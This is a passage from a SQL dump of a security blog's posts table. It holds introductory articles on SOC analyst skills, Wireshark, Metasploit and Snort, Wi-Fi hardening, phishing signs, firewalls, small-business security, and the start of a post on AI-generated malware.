These key concepts underpin almost every cybersecurity framework used today:\n\n- **CIA Triad (Confidentiality, Integrity, Availability)**: A guide to balancing data protection, ensuring that sensitive information is only accessible by authorized individuals (confidentiality), not tampered with (integrity), and available (availability) when needed.\n- **Least Privilege**: Ensuring users and systems only have access to what\'s strictly necessary to perform their functions.\n- **Defense in Depth**: A multi-layered security strategy where multiple measures protect a system. Even if one layer fails, others continue to provide protection.\n\nThese principles create the groundwork for strong security practices.\n\n## 3. Know Common Attack Vectors\n\nUnderstanding how attackers infiltrate systems helps SOC Analysts effectively detect and respond to threats. Familiarize yourself with these common attack methods:\n\n- **Malware (e.g., viruses, ransomware, Trojans, worms)**: Software designed to disrupt, damage, or gain unauthorized access to systems.\n- **Phishing**: One of the most prevalent attacks, where users are tricked into revealing sensitive information or clicking malicious links.\n- **Distributed Denial of Service (DDoS)**: Attacks that overwhelm systems and networks to disrupt services.\n- **SQL Injection**: Exploiting vulnerabilities in database queries to gain unauthorized access to data.\n\nKnowing how these attacks work and recognizing their signs equips SOC Analysts to act swiftly and decisively.\n\n## 4. Get Comfortable with Security Tools\n\nSOC Analysts rely heavily on security tools to detect, analyze, and report incidents. 
To excel, be proficient in these key categories of tools:\n\n- **SIEM (Security Information and Event Management) Systems**: Tools like Splunk, IBM QRadar, or Elastic stack for analyzing events across the IT infrastructure.\n- **IDS/IPS (Intrusion Detection/Prevention Systems)**: Tools such as Snort or Zeek to identify and prevent suspicious activity.\n- **Firewalls**: Important for perimeter monitoring—SOCs often need to understand configuration rules and logs.\n- **Endpoint Detection and Response (EDR)**: Tools like CrowdStrike or Carbon Black that focus on endpoint security.\n\nHands-on experience is invaluable. Most employers will value proficiency in at least one tool in these categories.\n\n## 5. Master Log Analysis\n\nSOC Analysts process vast amounts of data daily, so the ability to analyze logs for security incidents is crucial. Logs are recorded across practically every network entity—firewalls, servers, routers—and contain vital clues about suspicious activity. Analysts should be able to:\n\n- Recognize patterns of malicious behavior across logs.\n- Filter and correlate data from multiple sources using SIEM systems.\n- Look out for anomalies like unusual login attempts or unauthorized file access.\n\nDeveloping sharp log analysis skills ensures no potential incident escapes detection.\n\n## 6. Understand Incident Response\n\nSOC Analysts play a critical role in the incident response lifecycle. Familiarity with these key steps provides structure in high-pressure situations:\n\n1. **Identification**: Recognize and verify the security incident.\n2. **Containment**: Isolate the affected systems to stop further damage.\n3. **Eradication**: Remove malicious entities from the network.\n4. **Recovery**: Restore systems and normal business functions without recurring vulnerabilities.\n5. 
**Post-Incident Analysis**: Document the event thoroughly and improve systems to prevent recurrence.\n\nSticking to a structured incident response plan minimizes downtime and improves organizational resilience.\n\n## 7. Grasp Threat Intelligence\n\nThreat intelligence gives SOC Analysts a proactive edge by helping them understand the broader cyber threat landscape. Analysts should focus on:\n\n- **Threat Actors**: Understanding who might target their company (e.g., nation-states, hacktivists, or insider threats).\n- **Tactics, Techniques, and Procedures (TTPs)**: Used by cybercriminals.\n- Tracking global or industry-specific emerging threats.\n\nUsing data from platforms like MITRE ATT&CK, VirusTotal, or Recorded Future will help your organization understand and prepare for potential risks.\n\n## 8. Stay Compliant with Regulations\n\nSOC Analysts must also align with compliance frameworks and regulations that secure data and protect privacy. Familiarize yourself with:\n\n- **GDPR**: For privacy compliance in Europe.\n- **HIPAA**: For handling healthcare data.', '', 'http://infoseclabs.io/uploads/1767909003079-180527002.png', 'SOC Analyst monitoring cybersecurity threats on computer screens', 1, 'published', '2026-01-08 16:49:00', '2026-01-09 00:50:08', 'Information Security', '10 Essentials Every SOC Analyst Must Know', 'Discover the top 10 skills every SOC Analyst needs to excel in cybersecurity defense.', 'SOC Analyst'),
(27, 'Exploring Open Source Tools for Cybersecurity Professionals', 'exploring-open-source-tools-for-cybersecurity-professionals', '# The Dynamic World of Cybersecurity Tools\n\nThe cybersecurity landscape is dynamic, challenging, and undeniably vital in today’s technology-driven world. Whether you\'re an aspiring SOC analyst, a network administrator, or someone interested in safeguarding digital assets, having the right tools at your disposal is critical. This is where open-source cybersecurity tools shine.\n\nThese tools are not just cost-effective but community-driven, continuously evolving, and highly customizable. From analyzing your network traffic to identifying vulnerabilities and monitoring potential threats, open-source tools are integral to ensuring robust cybersecurity. This blog explores three essential tools—Wireshark, Metasploit, and Snort—that every cybersecurity professional, beginner, or enthusiast should know about.\n\n## What Are Open Source Cybersecurity Tools?\n\nOpen-source cybersecurity tools are software programs with their source code made freely available to the public. This allows users to access, modify, and distribute the software in line with their specific needs.\n\n### Benefits of Open Source Tools:\n\n- **Cost-efficiency**: They’re generally free, making them accessible to anyone, including students and small organizations.\n- **Community Support**: Contributions from worldwide cybersecurity experts enhance features and fix vulnerabilities quickly.\n- **Customizability**: Users can tailor these tools to meet their unique cybersecurity requirements.\n\nFor cybersecurity roles, ranging from penetration testing to network administration, these tools offer the flexibility and power to perform critical tasks efficiently. 
Now, let\'s dig deep into three open-source giants in the cybersecurity space.\n\n## Wireshark: The Go-To Tool for Network Analysis\n\nWireshark is one of the most widely used open-source tools for network protocol analysis. Its comprehensive set of features allows users to capture, inspect, and analyze network traffic in real-time. Whether you’re troubleshooting network issues or detecting malicious activity, Wireshark can give you the insights you need.\n\n### Capabilities of Wireshark\n\n- Captures and inspects data packets across a network.\n- Identifies unusual spikes or suspicious traffic for further analysis.\n- Deciphers protocols and displays data in human-readable formats.\n- Offers filters to zero in on specific traffic (e.g., filtering by IP addresses or specific protocols).\n\n### How to Use Wireshark\n\n1. **Download and Install**:  \n   Visit the [official Wireshark website](https://www.wireshark.org/) to download the software for your operating system.\n\n2. **Capture Network Traffic**:  \n   Open Wireshark and choose the appropriate network interface (e.g., Wi-Fi, Ethernet). Click \"Start\" to begin capturing live data.\n\n3. **Apply Filters**:  \n   Use Wireshark’s powerful filters to narrow down your results. For example:\n   - `http` filters for HTTP traffic.\n   - `ip.src == [IP]` filters for packets originating from a specific IP address.\n\n4. **Analyze Data Packets**:  \n   Inspect individual packets for payloads, source/destination addresses, or protocol details.\n\n### Practical Use Cases\n\n- Troubleshooting network performance issues.\n- Identifying unauthorized devices on a network.\n- Detecting potential data breaches or malware communications.\n\nWireshark is invaluable for maintaining network transparency and spotting anomalies.\n\n## Metasploit: The Ultimate Penetration Testing Framework\n\nIf Wireshark is for monitoring, Metasploit is for offense. 
Metasploit is an open-source penetration testing framework that allows cybersecurity professionals to test system vulnerabilities by simulating cyberattacks in controlled environments.\n\n### Introduction to Metasploit\n\nMetasploit combines a massive library of exploits, payloads, and auxiliary tools to test the resilience of various systems against attacks. It’s widely used by ethical hackers to identify vulnerabilities before malicious actors exploit them.\n\n### Steps to Perform Vulnerability Testing with Metasploit\n\n1. **Setup and Installation**:  \n   Download Metasploit from the [Rapid7 website](https://www.metasploit.com/). It supports Linux, Windows, and macOS.\n\n2. **Select a Target**:  \n   Identify the system or service you want to test and gather its IP address or hostname.\n\n3. **Choose an Exploit**:  \n   Look for known vulnerabilities in Metasploit\'s database (use the `search [vulnerability]` command).\n\n4. **Test with a Payload**:  \n   Select a payload (e.g., reverse shell) and configure the parameters.\n\n5. **Execute Test**:  \n   Launch your simulated attack responsibly within a controlled setup.\n\n### Executors Beware! Use Metasploit Safely\n\n- Only use Metasploit in test environments or on systems you are authorized to test.\n- Always notify relevant stakeholders if you’re testing workplace systems.\n\nEthical hacking with Metasploit enables you to patch vulnerabilities before attackers can exploit them.\n\n## Snort: Your Intrusion Detection and Prevention Ally\n\nSnort, authored by Cisco Talos, is a popular open-source intrusion detection system (IDS) and intrusion prevention system (IPS). 
\n\n--- \n\nBy understanding and utilizing these open-source tools, you can significantly enhance your cybersecurity posture, whether you are monitoring network traffic, testing vulnerabilities, or preventing intrusions.', '', 'http://infoseclabs.io/uploads/1767909071893-784433651.jpg', 'Cybersecurity tools concept with digital security icons', 1, 'published', '2025-12-25 08:51:00', '2026-01-09 00:52:20', 'Information Security', 'Top Open Source Tools for Cybersecurity Experts', 'Discover the best open-source tools like Wireshark, Metasploit, and Snort for effective cybersecurity management.', 'Open Source Cybersecurity'),
(28, 'Secure Your Wi-Fi: Tips for a Stronger Network at Home', 'secure-your-wi-fi-tips-for-a-stronger-network-at-home', '# Securing Your Home Wi-Fi Network\n\nYour home Wi-Fi network is more than just an internet connection—it\'s the gateway to personal data, banking details, smart home devices, and much more. With the rise in cybersecurity threats, leaving your Wi-Fi network unprotected is like leaving your front door wide open. This guide will walk you through steps to secure your Wi-Fi and ensure that your network, and everything connected to it, stays safe from prying eyes.\n\nWhether you\'re an IT professional or someone simply looking to secure their home, these tips will help you create a stronger, safer network.\n\n## Understanding Wi-Fi Security Protocols\n\nWhen setting up your Wi-Fi, you\'ll encounter different security protocols. Understanding these is crucial for making informed decisions about your network\'s protection.\n\n- **WEP (Wired Equivalent Privacy)** – Outdated and highly vulnerable to attacks. Avoid this protocol.\n- **WPA (Wi-Fi Protected Access)** – A significant improvement over WEP, but now considered obsolete.\n- **WPA2** – Widely used and more secure than WPA. It\'s a good standard but not foolproof anymore.\n- **WPA3** – The most secure protocol currently available. If your router supports this, make sure to enable it.\n\n**Pro tip**: Always opt for WPA3 if it’s supported by your router and devices. If not, WPA2 should be your fallback.\n\n## Setting a Strong Password\n\nA weak Wi-Fi password is an open invitation to hackers. 
Here’s how to create a password that’s tough to crack but easy for you to remember:\n\n- Use at least 12 characters.\n- Combine uppercase and lowercase letters, numbers, and special characters.\n- Avoid using common words, names, or birthdates.\n- Use a passphrase, like \"My$SecureWi-Fi123\", that’s unique but memorable.\n\n**Pro tip**: Try a password manager to generate and store strong passwords securely.\n\n## Enabling Network Encryption\n\nEncryption scrambles your data, making it unreadable to unauthorized users. Most modern routers support encryption protocols like WPA2 or WPA3.\n\n### Step-by-step guide:\n\n1. Log in to your router’s admin panel (usually via a browser—check your router’s manual).\n2. Locate the wireless security settings.\n3. Select WPA3 (or WPA2 if WPA3 isn’t available).\n4. Save and reboot your router to apply changes.\n\n## Regularly Updating Firmware\n\nYour router’s firmware is essentially its operating system. Manufacturers frequently release updates to fix bugs and patch security vulnerabilities.\n\n1. Log in to your router’s admin panel.\n2. Check for a firmware update option (often found under “System” or “Settings”).\n3. Download and install updates as they become available.\n\n**Pro tip**: Some routers have auto-update features—enable this if it’s available.\n\n## Enabling Firewall Protection\n\nA firewall adds an additional layer of defense by monitoring and blocking malicious traffic. Many modern routers come with a built-in firewall, but it’s often disabled by default.\n\n- Log into your router’s admin settings and activate the firewall.\n- For advanced users, configure custom rules to enhance protection further.\n\n## Disabling WPS\n\nWi-Fi Protected Setup (WPS) was designed for convenience but is now recognized as a security vulnerability. Hackers can exploit WPS to gain unauthorized access.\n\nTo disable it:\n\n1. Go to the admin panel of your router.\n2. Find the WPS settings under “Wireless” or “Advanced settings.”\n3. 
Turn it off.\n\n## Changing the Default SSID\n\nThe default Service Set Identifier (SSID) is usually the brand name of your router, which makes it easier for attackers to identify and exploit its vulnerabilities.\n\n- Rename your network to something unique and unrelated to your name or address.\n- Avoid using personal information like your last name in the SSID.\n\n**Pro tip**: A generic name like “CoffeeHouse_Network” works well to obscure your identity.\n\n## Implementing MAC Address Filtering\n\nEvery device that connects to your network has a unique MAC address. By enabling MAC address filtering, you can control which devices are allowed to connect.\n\n1. Log in to your router’s admin panel and look for “MAC Filtering” under wireless or security settings.\n2. Add the MAC addresses of your trusted devices to the whitelist.\n\n**Note**: This method isn’t foolproof, as advanced hackers can spoof MAC addresses, but it adds an extra layer of defense.\n\n## Monitoring Connected Devices\n\nKeeping track of who is on your network helps you detect any unauthorized access.\n\n- Use your router’s admin panel to view a list of connected devices.\n- Regularly check for names or MAC addresses you don’t recognize.\n- Kick off intruders and change your Wi-Fi password if necessary.\n\n## Using a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic and masks your IP address, adding extra protection against hackers.\n\n- Install a VPN on your router to secure every device connected to your network.\n- Alternatively, install a VPN on individual devices for more flexibility.\n\n## Setting Up a Guest Network\n\nAllowing visitors to connect to your main Wi-Fi puts your entire network at risk. Instead, create a guest network with limited access.\n\n1. Open your router’s settings.\n2. Look for “Guest Network” under wireless options.\n3. 
Assign a separate SSID and password for guests.\n\nThis keeps your main network safe while providing your visitors with internet access.', '', 'http://infoseclabs.io/uploads/1767909243749-760907848.png', 'Home Wi-Fi network security with router and firewall protection', 1, 'published', '2026-01-08 08:54:00', '2026-01-09 00:54:29', 'Information Security', 'Secure Your Wi-Fi: Tips for a Stronger Network', 'Learn essential tips to secure your home Wi-Fi network and protect personal data from cyber threats.', 'Wi-Fi security'),
(29, 'Anatomy of a Phishing Attack: How to Recognize the Signs', 'anatomy-of-a-phishing-attack-how-to-recognize-the-signs', '# Understanding Phishing Attacks: A Comprehensive Guide\n\nPhishing attacks are among the most common cybersecurity threats affecting businesses today. Whether it\'s a cleverly disguised email or a fraudulent website, phishing can result in financial loss, stolen data, and compromised systems. Yet, despite its prevalence, many small business owners and professionals remain unsure about how to identify and defend against these attacks.\n\nThis blog will guide you through the ins and outs of phishing campaigns. We\'ll cover the various types of phishing attacks, key signs to watch out for, real-world examples, and actionable steps to protect your business. By the end, you\'ll have the knowledge and tools to stay a step ahead of cybercriminals.\n\n## What Are Phishing Attacks?\n\nPhishing is a type of cyberattack where hackers pose as legitimate entities to trick victims into providing sensitive information, such as passwords, credit card numbers, or company data. These attacks are often carried out via fake emails, websites, or messages designed to appear highly authentic, making them difficult to spot.\n\nPhishing is the foundation of many larger cybercrimes, from ransomware attacks to financial fraud, making it essential for businesses to understand and mitigate these risks.\n\n### Why Are Small Businesses and Startups at Risk?\n\nSmaller businesses may not have the extensive cybersecurity measures that larger enterprises often possess, making them attractive targets for hackers. 
Entrepreneurs and IT professionals managing growing organizations are often juggling multiple priorities, increasing the likelihood of an attack slipping through unnoticed.\n\nUnderstanding phishing on a deeper level is the first step in fortifying your operations.\n\n## Common Types of Phishing Attacks\n\nPhishing tactics come in several forms, each tailored to exploit different types of vulnerabilities. Here’s a breakdown:\n\n### 1. Email Phishing\n\nThe most common form, email phishing, involves attackers sending messages that appear to come from trusted sources. These emails often include urgent calls to action, like \"Your account will be locked in 24 hours. Click here to reset your password.\"\n\n### 2. Spear Phishing\n\nUnlike generic phishing, spear phishing targets specific individuals or companies. Attackers often do their homework, researching their victim\'s job title and organization to craft personalized messages that feel legitimate.\n\n### 3. Clone Phishing\n\nThis involves creating a nearly identical copy of a legitimate email that the recipient has already received. By adding malicious links or attachments, attackers can exploit the trust the recipient places in the sender.\n\n### 4. Vishing (Voice Phishing)\n\nPhishing isn\'t limited to the digital space. Vishing uses phone calls to trick people into revealing sensitive information, often posing as a bank or tech support.\n\n### 5. Smishing (SMS Phishing)\n\nSimilar to email attacks, smishing occurs through text messages. These usually contain a malicious link, urging users to act quickly.\n\n### 6. Pharming\n\nPharming redirects users from a legitimate website to a fraudulent one, often by exploiting DNS servers. 
Once on the fake site, users unwittingly input critical data.\n\nUnderstanding these forms allows you to better anticipate and defend against phishing tactics.\n\n## Key Signs of a Phishing Email\n\nPhishing emails often appear legitimate, but close inspection can reveal inconsistencies. Here are key signs to look out for:\n\n1. **Suspicious Sender Addresses**  \n   Legitimate companies always use official email domains. Watch out for subtle misspellings like “@paypa1.com” instead of “@paypal.com.”\n\n2. **Urgency or Fear-Based Subject Lines**  \n   Attackers create a sense of panic to compel immediate action, such as “Your bank account has been compromised!”\n\n3. **Generic Greetings**  \n   Phishing emails often use vague greetings like “Dear customer” instead of your name.\n\n4. **Unexpected Attachments**  \n   Legitimate sources are unlikely to send attachments you didn’t request. Malicious attachments can infect your system with malware.\n\n5. **Links with Mismatched URLs**  \n   Hover over any links before clicking. A mismatch between the text and URL is a major red flag.\n\nThe devil is in the details when it comes to phishing, so slow down and review suspicious emails carefully.\n\n## Technical Indicators to Watch Out For\n\nBeyond visual cues, phishing emails often contain technical abnormalities:\n\n- **Misspelled URLs:** Check for slight deviations in trusted web addresses.\n- **Lack of HTTPS Security:** Legitimate companies use secure “https://” websites, especially for transactions. Keep in mind that many phishing sites also use HTTPS, so a padlock alone is not proof that a site is genuine.\n- **Unusual Metadata:** Analyzing an email’s header or source code can sometimes reveal forgery.\n\nTools that flag these issues, such as URL checkers or email filters, can help identify phishing attempts before the damage is done.\n\n## Real-World Phishing Case Studies\n\n### Case Study 1: The Google and Facebook Scam\n\nAttackers successfully scammed Google and Facebook out of over $100 million by posing as a legitimate vendor through fake invoices. 
Both companies fell for the trap and paid the fraudulent bills, showing that even tech giants aren’t immune.\n\n### Case Study 2: The Target Data Breach\n\nHackers gained access to Target\'s systems by spear phishing an HVAC subcontractor. The breach compromised 40 million customer credit card details and cost Target millions in lawsuits.\n\nThese real-world examples highlight the effectiveness of phishing and the critical need for preventative measures.\n\n## Steps to Take If You Suspect a Phishing Attempt\n\nIf you suspect an email or message is a phishing attempt, here’s what to do:\n\n1. **Don’t Click Links or Download Attachments:**  \n   Avoid engaging with suspected phishing content.\n\n2. **Verify the Sender:**  \n   Contact the company directly using official channels to confirm legitimacy.\n\n3. **Report the Email:**  \n   Most email providers allow you to flag suspicious emails as “phishing.”\n\n4. **Update Passwords:**  \n   If you’ve interacted with a phishing scam, immediately change affected passwords.\n\nHaving clear protocols for suspected phishing attempts can mitigate damage quickly.\n\n## Tools and Technologies to Protect Against Phishing\n\nLeveraging technology is critical in staying ahead of phishing threats. Consider using:\n\n1. **Email Security Software:**  \n   Tools like Mimecast and Proofpoint identify and filter phishing content.\n\n2. **Web Filtering Tools:**  \n   Prevent access to malicious websites with tools like OpenDNS.', '', 'http://infoseclabs.io/uploads/1767909305235-538274400.png', 'Illustration of a deceptive phishing email targeting a business', 1, 'published', '2026-01-08 16:55:00', '2026-01-09 00:55:55', NULL, 'Recognizing Phishing Attacks: Key Signs & Protection', 'Learn to recognize phishing attacks and protect your business from common cybersecurity threats with this comprehensive guide.', 'Phishing Attacks'),
(30, 'Firewalls vs. Next-Generation Firewalls (NGFW): What Cybersecurity Professionals Need to Know', 'firewalls-vs-next-generation-firewalls-ngfw-what-cybersecurity-professionals-need-to-know', '# Understanding Firewalls and Next-Generation Firewalls (NGFWs)\n\nCyber threats are evolving at an unprecedented pace, targeting businesses of all sizes and industries. At the frontline of defense are firewalls, essential tools for protecting networks and sensitive data. However, with increasingly sophisticated attacks, traditional firewalls can no longer keep up. Enter Next-Generation Firewalls (NGFWs): a cutting-edge solution for managing and mitigating modern threats.\n\nWhether you\'re an IT professional, a small business owner, or just beginning your cybersecurity career, understanding firewalls and NGFWs is critical to protecting networks in today’s digital landscape. This blog will break down what makes firewalls and NGFWs tick, examine their key differences, and show you how to implement them effectively.\n\n## What is a Firewall?\n\nA firewall is a device or software designed to monitor and regulate incoming and outgoing network traffic. Acting as a gatekeeper, it makes decisions about whether to allow or block specific traffic based on a predefined set of security rules.\n\n### A Brief History of Firewalls\n\nThe concept of firewalls dates back to the late 1980s. Early iterations, referred to as packet-filtering firewalls, focused solely on examining individual packets of data against predetermined security rules. 
By the mid-1990s, stateful inspection firewalls emerged, adding the ability to monitor the state of active connections—an important advancement at the time.\n\n### Basic Functions\n\nKey functions of a firewall include the following:\n\n- **Traffic filtering**: Prevents unauthorized access by filtering network packets.\n- **Protection against external threats**: Reduces the likelihood of attacks like malware and unauthorized hacking attempts.\n- **Port blocking**: Prevents attackers from exploiting unused or vulnerable ports.\n\nWhile traditional firewalls still serve essential purposes, they are limited in addressing today’s advanced threats.\n\n## What is a Next-Generation Firewall (NGFW)?\n\nNGFWs are the natural evolution of traditional firewalls, offering advanced capabilities tailored to defend against modern threats. Beyond regulating network traffic, NGFWs incorporate sophisticated features like deep packet inspection, intrusion detection, and application-awareness.\n\n### Advanced Features of NGFWs\n\n1. **Deep Packet Inspection (DPI)**  \n   Unlike basic packet filtering, DPI analyzes the data within packets to detect malicious activity, such as malware or phishing attacks.\n\n2. **Intrusion Detection and Prevention Systems (IDPS)**  \n   NGFWs actively monitor network activity to identify and block suspicious behavior.\n\n3. **Application-Aware Filtering**  \n   This feature enables NGFWs to identify and control traffic based on the specific applications being used, helping safeguard against app-based vulnerabilities.\n\n4. **SSL/TLS Inspection**  \n   NGFWs can decrypt and inspect encrypted traffic, which is essential given the growing number of encrypted attacks.\n\n5. 
**User Identity Awareness**  \n   By integrating with authentication systems, NGFWs can apply user-specific policies, a critical enhancement for environments with multiple access roles.\n\n### Benefits Over Traditional Firewalls\n\nNGFWs are designed for modern challenges, providing a more comprehensive approach to network security by addressing complex threats traditional firewalls can’t. Their ability to integrate application-level filtering, behavioral analysis, and threat intelligence make NGFWs indispensable in advanced cybersecurity strategies.\n\n## Key Differences Between Firewalls and NGFWs\n\n| Feature                   | Traditional Firewalls                          | Next-Generation Firewalls (NGFWs)       |\n|---------------------------|------------------------------------------------|-----------------------------------------|\n| Traffic Filtering         | Basic packet filtering and stateful inspection | DPI, signature-based detection, and more|\n| Threat Detection          | Limited                                        | Advanced (malware, phishing, etc.)      |\n| Application Awareness     | Absent                                         | Present                                 |\n| SSL/TLS Inspection        | Limited or absent                              | Advanced with encrypted traffic analysis|\n| User Identity Integration | Minimal                                        | Advanced integration with user authentication|\n\nWhile traditional firewalls are suitable for simple network setups, most businesses and enterprises benefit from using NGFWs for robust and scalable protection against today’s sophisticated threats.\n\n## Why Are Firewalls and NGFWs Important?\n\nFirewalls and NGFWs play a critical role in cybersecurity by securing communication channels, protecting sensitive data, and reducing the risk of attacks. 
Here’s why they are indispensable:\n\n- **Prevention of Unauthorized Access**: They act as gatekeepers between internal systems and external networks.\n- **Safeguarding Sensitive Data**: Firewalls protect confidential information from unauthorized access or theft.\n- **Proactive Threat Management**: NGFWs detect and neutralize threats in real time.\n- **Regulatory Compliance**: Many industries, such as healthcare and finance, require robust network security measures like firewalls to comply with regulations.\n\n## Use Cases for Firewalls and NGFWs\n\n### Healthcare Industry\n\nHospitals and clinics use NGFWs to protect patient data and prevent unauthorized access to medical networks. NGFWs can also block suspicious activity targeting medical IoT devices.\n\n### E-Commerce Platforms\n\nOnline retailers integrate NGFWs to secure payment systems, prevent phishing attempts, and ensure PCI-DSS compliance for credit card transactions.\n\n### Education Institutions\n\nUniversities deploy firewalls and NGFWs to regulate traffic within vast campus networks and protect student and faculty data from cyber threats.\n\n### Small Businesses\n\nFor SMEs, NGFWs provide cost-effective solutions for safeguarding sensitive employee and client information while mitigating financial and reputational risks.\n\n## Best Practices for Implementing Firewalls and NGFWs\n\n[Content for this section is missing and incomplete. Please provide additional text to complete this section.]', '', 'http://infoseclabs.io/uploads/1768255882157-340195749.jpg', 'Comparison of traditional firewalls and Next-Generation Firewalls', 1, 'published', '2026-01-12 10:10:00', '2026-01-14 20:26:58', 'Information Security', 'Firewalls vs NGFW: Essential Cybersecurity Insights', 'Discover the key differences between traditional firewalls and Next-Gen Firewalls, crucial for modern cybersecurity.', 'Next-Generation Firewalls');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(31, 'Cybersecurity for Small Businesses: Affordable Best Practices', 'cybersecurity-for-small-businesses-affordable-best-practices', '# Protecting Your Small Business from Cyber Threats\n\nRunning a small business comes with its fair share of challenges: tight budgets, fierce competition, and limited resources. But one threat that often gets overlooked is cybersecurity breaches. Contrary to popular belief, cybercriminals don\'t just target large corporations. Small businesses and startups are frequently preyed upon because they often lack the robust defenses of their larger counterparts.\n\nIf you’re a small business owner or entrepreneur, this guide offers practical, budget-friendly cybersecurity measures to help keep your company safe from digital threats. You’ll learn about common cyber risks, cost-effective solutions, and actionable steps to create a solid cybersecurity plan.\n\n## Why Cybersecurity Matters for Small Businesses\n\nImagine what would happen if a cyberattack disrupted your operations. You could face the loss of sensitive customer data, reputational damage, or even financial ruin. According to the Cyber Readiness Report 2022, 46% of small businesses faced cyberattacks in the past year, with an average cost of $25,600 per attack.\n\nSmaller companies are particularly vulnerable because many lack dedicated IT teams or the funds to install advanced security systems. This makes affordable and achievable measures essential to safeguarding your business.\n\n## Understanding Common Cybersecurity Threats\n\nBefore you can protect your business, it’s important to understand the threats you’re defending against. Below are the most common cybersecurity risks small businesses face.\n\n### Phishing\n\nPhishing attacks trick employees into revealing sensitive information (such as passwords or credit card details) through fake emails, phone calls, or websites. 
These scams often appear to come from trusted sources, like a bank or a company executive.\n\n### Malware\n\nMalware, or “malicious software,” can infiltrate your systems via email attachments, downloads, or infected websites. It’s designed to corrupt, steal, or hold your data hostage. Common types of malware include viruses, worms, and spyware.\n\n### Ransomware\n\nRansomware attacks lock you out of your systems or data until you pay a ransom to the hackers. Small businesses are frequent targets because they’re perceived to have no choice but to pay to regain access to their data.\n\n## Affordable Cybersecurity Measures\n\nThe good news? You don’t need a sky-high budget to protect your business. Here are affordable practices and tools to safeguard your company against cyber threats.\n\n### Employee Training and Awareness\n\nYou can have the best tools in the world, but one phishing click from an employee can compromise them all. Provide mandatory cybersecurity training to ensure your team recognizes warning signs like phishing emails and suspicious websites.\n\n**Pro tip:** Free platforms like Cyber Aware offer training material tailored to small businesses.\n\n### Strong Password Policies\n\nWeak passwords are one of the most common vulnerabilities in any organization. Implement stronger password protocols to reduce risk. Encourage employees to use passwords that include a mix of uppercase and lowercase letters, numbers, and special characters.\n\nUse a password manager like LastPass or Bitwarden to create and securely store unique passwords.\n\n### Software Updates and Patch Management\n\nOutdated software is a playground for hackers. Ensure all your software—including operating systems, browsers, and plugins—is updated regularly. Enable automatic updates wherever possible to ensure you always have the latest version.\n\n**Budget tip:** Updates are free and often include critical security patches. 
Prioritize this practice!\n\n### Firewalls and Antivirus Software\n\nFirewalls act as a barrier between your internal networks and external threats, while antivirus software detects and removes malware. Together, they provide a multi-layered defense against cyberthreats.\n\nAffordable options include ZoneAlarm Free Firewall and AVG Antivirus Free.\n\n### Data Backup and Recovery\n\nOne of the most effective ways to minimize the impact of a ransomware attack or hardware failure is by having a reliable data backup system in place. Use the 3-2-1 rule:\n\n- Keep **3** copies of your data\n- Store them on **2** different types of media (e.g., external drive, cloud)\n- Keep **1** copy offsite for disaster recovery\n\nFree or low-cost services like Google Drive and IDrive for Business offer excellent options for smaller budgets.\n\n## Free or Low-Cost Tools for Cybersecurity\n\nLeveraging free or affordable tools can amplify your business\'s defense without breaking the bank. Here’s a list tailored for small businesses.\n\n- **Password Managers:** Bitwarden (free for individuals, $10/year per user for businesses).\n- **Antivirus Software:** Avast Free Antivirus or Sophos Home Free.\n- **Backup Tools:** IDrive offers 5 GB of free storage, with scalable paid plans for growing businesses.\n- **Phishing Defense:** Use free browser extensions like Netcraft to flag suspicious websites.\n- **Firewall Solutions:** Cisco Meraki’s small business offerings help secure devices with cost-effective firewall management.\n\n## Creating a Cybersecurity Plan: Step-by-Step Guide\n\nWithout a formal plan, your cybersecurity efforts might fall short. Follow these five steps to create a practical and actionable plan for your business.\n\n### Step 1: Assess Your Risks\n\nWhich assets—data, software, or hardware—are most critical to your business? 
Identify potential weak spots in your infrastructure, such as outdated software or overly accessible employee accounts.\n\n### Step 2: Define Your Objectives\n\nWhat do you want to achieve with your cybersecurity initiatives? For example, you might aim to reduce phishing incidents by 50% or ensure critical data backups are executed weekly.\n\n### Step 3: Implement Basic Security Measures\n\nStart with the essentials mentioned earlier—secure passwords, regular updates, and employee training.\n\n### Step 4: Document Your Policies\n\nWrite down procedures for handling sensitive data, managing software, and responding to breaches. This guide should be accessible to all employees and regularly updated.\n\n### Step 5: Monitor and Improve\n\nCybersecurity is an ongoing process. Conduct regular audits of your systems and protocols to ensure they’re up to date. Use monitoring tools like Splunk or SolarWinds to track network activity and detect anomalies.\n\n## Securing Your Business Future\n\nProtecting your business against cyberattacks doesn’t have to drain your budget. With the right mix of awareness, affordable tools, and proactive planning, you can significantly lower your risk without sacrificing your bottom line.\n\nSmall steps today can make a big difference tomorrow. Don’t wait for a cyberattack to show you the importance of cybersecurity. Start implementing these best practices now and build a resilient foundation for your business.\n\nIf you’re interested in advanced tools or tailored cybersecurity advice, many IT professionals and consultants specifically help small businesses. 
There’s no better time to fortify your defenses.', '', 'http://infoseclabs.io/uploads/1768411599121-644071808.jpg', 'Small business owner securing digital data from cyber threats', 1, 'published', '2026-01-13 23:00:00', '2026-01-14 21:14:36', 'Information Security', 'Cybersecurity Tips for Small Businesses', 'Discover affordable cybersecurity practices to protect your small business from digital threats and cyberattacks.', 'Cybersecurity'),
(32, 'AI-Generated Malware: Rising Cybersecurity Threats and How to Defend Against Them', 'ai-generated-malware-rising-cybersecurity-threats-and-how-to-defend-against-them', '# The Rise of AI-Generated Malware and How to Defend Against It\n\nArtificial Intelligence (AI) is revolutionizing sectors like healthcare and finance, but it’s also making waves in the realm of cybercrime. AI-generated malware is a new threat that exploits machine learning (ML) and automation to bypass traditional security measures. This article breaks down how AI malware works and outlines actionable defense strategies for cybersecurity professionals, IT teams, and researchers.\n\n## What is AI-Generated Malware?\n\nUnlike traditional malware, AI-generated threats can learn, adapt, and evolve to evade detection. This makes them more sophisticated and harder to counter. Here\'s how attackers use AI to amplify their efforts:\n\n### 1. Polymorphic Malware\n\nAI allows malware to continuously modify its code base, evading detection by signature-based antivirus tools. These frequent changes make it nearly impossible to spot with outdated systems.\n\n### 2. AI-Powered Phishing\n\nBy mimicking natural writing styles, AI generates phishing emails that appear human-like and highly convincing, dramatically increasing risk for unsuspecting users.\n\n### 3. Automated Exploit Generation\n\nWith machine learning, attackers rapidly identify software vulnerabilities and create automated exploits, slashing the development time for new attack vectors.\n\n### 4. Advanced Evasion Tactics\n\nAI-generated malware uses live analysis to adjust its approach in real-time, employing sandbox detection, adversarial ML techniques, or behavior evasion to avoid security measures.\n\n### 5. 
